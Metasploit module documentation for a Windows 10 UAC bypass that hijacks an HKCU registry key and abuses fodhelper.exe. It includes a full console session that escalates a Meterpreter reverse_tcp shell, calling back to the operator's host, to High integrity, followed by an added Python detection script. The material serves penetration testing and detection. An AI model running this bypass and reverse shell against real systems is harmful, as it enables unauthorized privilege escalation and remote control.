
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md

Vulnerable Application

Introduction

This module bypasses Windows 10 UAC by hijacking a special key in the Registry under the current user hive (HKCU) and inserting a custom command that is invoked when the Windows fodhelper.exe application is launched. It spawns a second shell that has the UAC flag turned off.

This module modifies a registry key, but cleans up the key once the payload has been invoked.

The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom, your DLL should call ExitProcess() after starting your payload in a separate process.

Usage

You'll first need to obtain a session on the target system. Next, once the module is loaded, you only need to set the payload and session options. The module uses a hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system. On slower systems this may be too short, resulting in no session being created. In this case, disable the automatic payload handler (set DISABLEPAYLOADHANDLER true) and manually create a job handler corresponding to the payload.

Scenarios

```
msf > [*] Sending stage (1189423 bytes) to 192.168.50.4
[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100

msf > sessions -i 11
[*] Starting interaction with 11...

meterpreter > shell
Process 9496 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
Mandatory Label\Medium Mandatory Level    Label    S-1-16-8192

C:\Users\sasha\Desktop>exit
exit
meterpreter >
Background session 11? [y/N]
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set SESSION 11
SESSION => 11
msf exploit(bypassuac_fodhelper) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64

msf exploit(bypassuac_fodhelper) > set target 0
target => 0
msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on 192.168.50.1:4445
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 192.168.50.4
[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100
[*] Cleaining up registry keys ...

meterpreter > shell
Process 4076 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
ERROR: Unable to get user claims information.
Mandatory Label\High Mandatory Level    Label    S-1-16-12288

C:\WINDOWS\system32>
```
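The Introduction and the session above together describe three observable steps: a value written under the current user hive, fodhelper.exe launched through cmd.exe /c, and the key removed again once the payload is running. The following detection script is an added example for defenders and is not part of the Metasploit module or its documentation. It correlates those three steps over Sysmon-like process and registry events. The event field names, the sample records and the stager path are constructed for the example, and <HIJACKED-KEY> is a placeholder because the write-up does not name the key the module modifies.

```python
"""Correlate an HKCU registry write, a cmd.exe /c launch of fodhelper.exe and
the follow-up key deletion into one finding (added example, constructed data)."""
from __future__ import annotations

from datetime import datetime, timedelta

# Constructed sample events, loosely shaped like Sysmon records (event ids in
# comments). Host names, PIDs and paths are invented; <HIJACKED-KEY> is a
# placeholder for the key the module writes, which the write-up does not name.
SAMPLE_EVENTS = [
    # Sysmon 1: benign launch of fodhelper.exe from the Settings UI (explorer parent)
    {"ts": "2017-05-22T19:05:10", "kind": "process_create", "user": "WS01\\sasha",
     "image": "C:\\WINDOWS\\System32\\fodhelper.exe",
     "parent_image": "C:\\WINDOWS\\explorer.exe",
     "parent_cmdline": "C:\\WINDOWS\\explorer.exe"},
    # Sysmon 13: value set under the current-user hive by the stager process
    {"ts": "2017-05-22T19:11:59", "kind": "registry_set", "user": "WS01\\sasha",
     "image": "C:\\Users\\sasha\\Desktop\\stager.exe",
     "target": "HKCU\\<HIJACKED-KEY>\\command\\(Default)"},
    # Sysmon 1: fodhelper.exe started via cmd.exe /c, as the module's log line shows
    {"ts": "2017-05-22T19:12:02", "kind": "process_create", "user": "WS01\\sasha",
     "image": "C:\\WINDOWS\\System32\\fodhelper.exe",
     "parent_image": "C:\\WINDOWS\\system32\\cmd.exe",
     "parent_cmdline": "C:\\WINDOWS\\system32\\cmd.exe /c C:\\WINDOWS\\System32\\fodhelper.exe"},
    # Sysmon 12: the module's cleanup deletes the key again
    {"ts": "2017-05-22T19:12:04", "kind": "registry_delete", "user": "WS01\\sasha",
     "image": "C:\\Users\\sasha\\Desktop\\stager.exe",
     "target": "HKCU\\<HIJACKED-KEY>\\command"},
]


def _ts(event: dict) -> datetime:
    return datetime.fromisoformat(event["ts"])


def _is_cmd_launched_fodhelper(event: dict) -> bool:
    """fodhelper.exe whose parent is cmd.exe running a one-shot /c command."""
    if event["kind"] != "process_create":
        return False
    if not event["image"].lower().endswith("\\fodhelper.exe"):
        return False
    parent_is_cmd = event["parent_image"].lower().endswith("\\cmd.exe")
    return parent_is_cmd and "/c" in event["parent_cmdline"].lower().split()


def find_fodhelper_hijacks(events: list[dict], window_seconds: int = 30) -> list[dict]:
    """Return one finding per suspicious fodhelper.exe launch.

    A launch is suspicious when the same user wrote a value under HKCU within
    `window_seconds` before it. The module waits only 5 s for fodhelper.exe
    (see Usage), so a short window suffices; 30 s leaves slack for slow hosts.
    A matching key deletion shortly after the launch raises the confidence.
    """
    window = timedelta(seconds=window_seconds)
    events = sorted(events, key=_ts)
    findings = []
    for launch in events:
        if not _is_cmd_launched_fodhelper(launch):
            continue
        t_launch = _ts(launch)
        writes = [e for e in events
                  if e["kind"] == "registry_set"
                  and e["user"] == launch["user"]
                  and e["target"].upper().startswith("HKCU\\")
                  and timedelta(0) <= t_launch - _ts(e) <= window]
        if not writes:
            continue
        # Drop the value name so a later key deletion compares equal to the write.
        keys = {e["target"].rsplit("\\", 1)[0] for e in writes}
        cleaned = [e for e in events
                   if e["kind"] == "registry_delete"
                   and e["user"] == launch["user"]
                   and e["target"] in keys
                   and timedelta(0) <= _ts(e) - t_launch <= window]
        findings.append({
            "user": launch["user"],
            "launch_ts": launch["ts"],
            "parent_cmdline": launch["parent_cmdline"],
            "hijacked_keys": sorted(keys),
            "writer_images": sorted({e["image"] for e in writes}),
            "cleanup_seen": bool(cleaned),
            "confidence": "high" if cleaned else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_fodhelper_hijacks(SAMPLE_EVENTS):
        print(finding)
```

The benign explorer.exe launch produces no finding, while the cmd.exe /c launch three seconds after the HKCU write is reported, and the deletion two seconds later (the module's "Cleaining up registry keys" step) marks it high confidence. Because the module removes the key almost immediately, a point-in-time registry audit will usually miss it; correlating the write and delete around the process launch is what makes the short-lived change visible.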